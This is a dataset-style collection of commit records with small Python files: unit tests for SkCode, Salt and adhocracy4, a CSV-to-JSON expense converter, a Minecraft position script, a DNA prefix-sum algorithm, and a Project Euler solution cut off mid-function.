TamiaLab/PySkCode
|
Add tests suite for electronic NOT tag.
|
"""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
<commit_before><commit_msg>Add tests suite for electronic NOT tag.<commit_after>
|
"""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
Add tests suite for electronic NOT tag."""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
<commit_before><commit_msg>Add tests suite for electronic NOT tag.<commit_after>"""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
|
f04fe3f19efc7fb01c7b2dc9cd09f329ca404c12
|
utils/csv-to-json.py
|
utils/csv-to-json.py
|
import argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
Convert OSH expense data CSV to JSON
|
Convert OSH expense data CSV to JSON
|
Python
|
apache-2.0
|
cartland/octavia-street-hilton,cartland/octavia-street-hilton,cartland/octavia-street-hilton
|
Convert OSH expense data CSV to JSON
|
import argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
<commit_before><commit_msg>Convert OSH expense data CSV to JSON<commit_after>
|
import argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
Convert OSH expense data CSV to JSONimport argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
<commit_before><commit_msg>Convert OSH expense data CSV to JSON<commit_after>import argparse
import csv
import json
import sys
from decimal import Decimal
from re import sub
parser = argparse.ArgumentParser(description='Convert Octavia Street Hilton expenses spreadsheet data to JSON.')
parser.add_argument('--csv', dest='csv_file', metavar='c', type=str, nargs=1,
help='an integer for the accumulator')
parser.add_argument('--json', dest='json_file', metavar='j', type=str, nargs='?', default=None,
help='output JSON filename')
args = parser.parse_args()
csv_file_name = args.csv_file[0]
try:
csvfile = open(csv_file_name, 'r')
except Exception as e:
print 'Could not open CSV file: "%s"' % csv_file_name
raise e
json_file_name = csv_file_name + '.json'
if args.json_file is not None:
json_file_name = args.json_file
try:
jsonfile = open(json_file_name, 'w')
except Exception as e:
print 'Could not open JSON file to write: "%s"' % json_file_name
raise e
reader = csv.DictReader(csvfile)
data = []
for row in reader:
if row['Purchaser'].startswith('...'):
continue # skip header rows
date = row['Date'].split('/') # 4/31/2014
row['Date'] = '%s-%s-%s' % (date[2], date[0].zfill(2), date[1].zfill(2)) # 2014-04-31
transaction = dict()
for key, value in row.items():
key = key.rsplit(' owes...', 1)[0]
key = key.lower()
if key in ['amount', 'cartland', 'npstanford', 'rcrabb', 'stromme']:
if value:
value = sub(r'[^\d\-.]', '', value)
transaction[key] = value
data.append(transaction)
json.dump(data, jsonfile)
|
|
37f22e55abf84c39846245fde53baf441dde7bff
|
tests/filter/test_paged_filterset.py
|
tests/filter/test_paged_filterset.py
|
from tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
Test to ensure GET data is cleaned from page arg
|
Test to ensure GET data is cleaned from page arg
|
Python
|
agpl-3.0
|
liqd/adhocracy4,liqd/adhocracy4,liqd/adhocracy4,liqd/adhocracy4
|
Test to ensure GET data is cleaned from page arg
|
from tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
<commit_before><commit_msg>Test to ensure GET data is cleaned from page arg<commit_after>
|
from tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
Test to ensure GET data is cleaned from page argfrom tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
<commit_before><commit_msg>Test to ensure GET data is cleaned from page arg<commit_after>from tests.apps.questions import models as question_models
from adhocracy4.filters.filters import PagedFilterSet
class TextFilter(PagedFilterSet):
class Meta:
model = question_models.Question
fields = ['text']
def test_page_clean_query(rf):
request = rf.get('/questions', {
'page': 1
})
filterset = TextFilter(data=request.GET, request=request)
assert 'page' not in filterset.data
|
|
f24fb7c26fd64d1039fc02318d42c89064c57cfc
|
tests/integration/shell/arguments.py
|
tests/integration/shell/arguments.py
|
# -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
Add test for unsupported kwarg
|
Add test for unsupported kwarg
|
Python
|
apache-2.0
|
saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt,saltstack/salt
|
Add test for unsupported kwarg
|
# -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
<commit_before><commit_msg>Add test for unsupported kwarg<commit_after>
|
# -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
Add test for unsupported kwarg# -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
<commit_before><commit_msg>Add test for unsupported kwarg<commit_after># -*- coding: utf-8 -*-
'''
Test Salt's argument parser
'''
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath, requires_salt_modules
ensure_in_syspath('../../')
# Import Salt libs
from salt.exceptions import SaltInvocationError
import integration
@requires_salt_modules('test.ping')
class ArgumentTestCase(integration.ModuleCase):
def test_unsupported_kwarg(self):
'''
Test passing a non-supported keyword argument
'''
self.assertEqual(
self.run_function('test.ping', ['foo=bar']),
("ERROR executing 'test.ping': The following keyword arguments "
"are not valid: foo=bar")
)
if __name__ == '__main__':
from integration import run_tests
run_tests(ArgumentTestCase)
|
|
3b53634f1888db8bc25e3b0bcf4eeb3b837ae370
|
playerAction.py
|
playerAction.py
|
import mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
Add player position action script
|
Add player position action script
|
Python
|
mit
|
Nekrofage/MinecraftPython
|
Add player position action script
|
import mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
<commit_before><commit_msg>Add player position action script<commit_after>
|
import mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
Add player position action scriptimport mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
<commit_before><commit_msg>Add player position action script<commit_after>import mcpi.minecraft as minecraft
import time
mc = minecraft.Minecraft.create()
while True:
pos = mc.player.getPos()
x = pos.x
y = pos.y
z = pos.z
# Display position
#print x, y, z
time.sleep(2)
if x >= 343.300 and y <= 344.700 and z <= -301.300 and z >= -302.700 and y == 4:
print "Active action"
mc.postToChat("Active action")
|
|
97942a6a79ddc269adeb761cc6e2a4aadb94dc65
|
samples/prepare_samples.py
|
samples/prepare_samples.py
|
#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
Add script to copy maf.py and waf
|
Add script to copy maf.py and waf
|
Python
|
bsd-2-clause
|
pfi/maf,pfi/maf
|
Add script to copy maf.py and waf
|
#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
<commit_before><commit_msg>Add script to copy maf.py and waf<commit_after>
|
#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
Add script to copy maf.py and waf#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
<commit_before><commit_msg>Add script to copy maf.py and waf<commit_after>#!/usr/bin/env python
"""
Prepares for running samples.
It just generates maf.py and copies maf.py and waf to each sample directory.
Please run this script before trying these samples.
"""
import glob
import os
import shutil
import subprocess
if __name__ == '__main__':
os.chdir('..')
subprocess.check_call('./generate_maf.py')
os.chdir('samples')
for d in glob.glob('*/'):
for f in '../maf.py', '../waf':
shutil.copy(f, d)
|
|
2de13254866d829089670135ac5844ceaff8994f
|
prefix_sums/min_impact_in_dna_sequence.py
|
prefix_sums/min_impact_in_dna_sequence.py
|
def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
Add algorithm for min impact calculation of DNA seq.
|
Add algorithm for min impact calculation of DNA seq.
|
Python
|
apache-2.0
|
isendel/algorithms
|
Add algorithm for min impact calculation of DNA seq.
|
def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
<commit_before><commit_msg>Add algorithm for min impact calculation of DNA seq.<commit_after>
|
def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
Add algorithm for min impact calculation of DNA seq.def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
<commit_before><commit_msg>Add algorithm for min impact calculation of DNA seq.<commit_after>def get_prefix_sum(A):
result = [0] * (len(A) + 1)
for i in xrange(1, len(A) + 1):
result[i] = result[i - 1] + A[i -1]
return result
def solution(S, P, Q):
hasA = get_prefix_sum([s == 'A' for s in S])
hasC = get_prefix_sum([s == 'C' for s in S])
hasG = get_prefix_sum([s == 'G' for s in S])
hasT = get_prefix_sum([s == 'T' for s in S])
result = [0] * len(P)
for i in xrange(len(P)):
p = P[i]
q = Q[i]
if hasA[q+1] - hasA[p] > 0:
result[i] = 1
elif hasC[q+1] - hasC[p] > 0:
result[i] = 2
elif hasG[q+1] - hasG[p] > 0:
result[i] = 3
elif hasT[q+1] - hasT[p] > 0:
result[i] = 4
return result
|
|
9e024eec337a4d1fabdf570d65cd841eac204a6f
|
project_euler/021.amicable_numbers.py
|
project_euler/021.amicable_numbers.py
|
'''
Problem 021
Let d(n) be defined as the sum of proper divisors of n (numbers less than n
which divide evenly into n).
If d(a) = b and d(b) = a, where a ≠ b, then a and b are an amicable pair and
each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55
and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71
and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10000.
Solution: Copyright 2017 Dave Cuthbert, MIT License
'''
import math
from collections import defaultdict
class DivisorSums():
sum_cache = defaultdict(lambda:1)
def _init_(self):
self.sum_cache
def add_value(self, n1, n2):
self.sum_cache[n1] = n2
def get_value(self, n1):
return self.sum_cache[n1]
def find_divisors(n):
divisors = {1}
for i in range(2, int(math.sqrt(n)) + 1):
if n % i == 0:
